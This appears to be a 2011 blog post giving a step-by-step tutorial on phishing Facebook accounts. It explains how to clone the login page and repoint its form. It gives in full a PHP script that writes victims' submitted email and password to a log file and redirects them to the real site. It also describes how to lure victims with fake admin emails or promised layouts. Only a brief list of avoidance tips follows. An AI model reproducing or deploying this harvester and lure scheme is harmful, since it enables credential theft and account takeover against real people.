Follow by Email

Tuesday, 12 April 2011

PHACEBOOK PHISHING WITH PHP (HACK)

Welcome to my tutorial on phishing facebook. Before we begin heres a little info on phishing; phishing is a way of retrieving passwords to secure accounts (in this case facebook) via creating a fake login page that retrieves data. If you dont feel like editing the code or copy/pasting the .php code I will provide download links for everything used. Now that we know a bit about phishing, lets begin. First things first, visit http://www.facebook.com/login.php once you get there right click on the page and click "View Page Source" (quite a lot of text (called HTML code) will pop up. Now select all and copy that into Notepad, Text-Edit or whatever the default text editor on whatever Linux distro you are using. Now Ctrl+F or Command+F then find "action=" (without quotes) and something like 'action=http://somedumbfacebookurl"'. change it to 'action="next.php"'. Now look just to the left of that, there should be something that says 'method="post"', change it to "method='get'. Save this as index.php (make sure its set to "all files" below file name instead of .txt). Now copy all this:
<?php
header("Location: http://www.facebook.com/login.php ");
$handle = fopen("logs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
And paste it into notepad. Save as  next.php using the method from before. Almost done! Now create an empty .txt file with notepad, name it "logs.txt". Now lets go make a free account on 110mb.com or a similar site. Upload all the files and send the link for indesx.php to your victim using either an e-mail account that looks like a facebook admin or asking them to login using it (claim it will give them a new layout or something) and wait! Once they have logged in their password and e-mail will show up in your logs.txt file you uploaded. 
LAZY PEOPLE, HERE ARE THE FILES!!!!
  1. index.php
  2.  next.php
  3. logs.txt
HOW TO AVOID BEING HACKED
  1. Always check urls
  2. Add the facebook e-mail address to your address book and dont listen to phonies
  3. Dont sign in because of promises of fake layouts or free game points
  4. Be prudent
 

    3 comments:

    1. Hmm interesting. Probably wont try it out but that stuffs pretty cool.

      ReplyDelete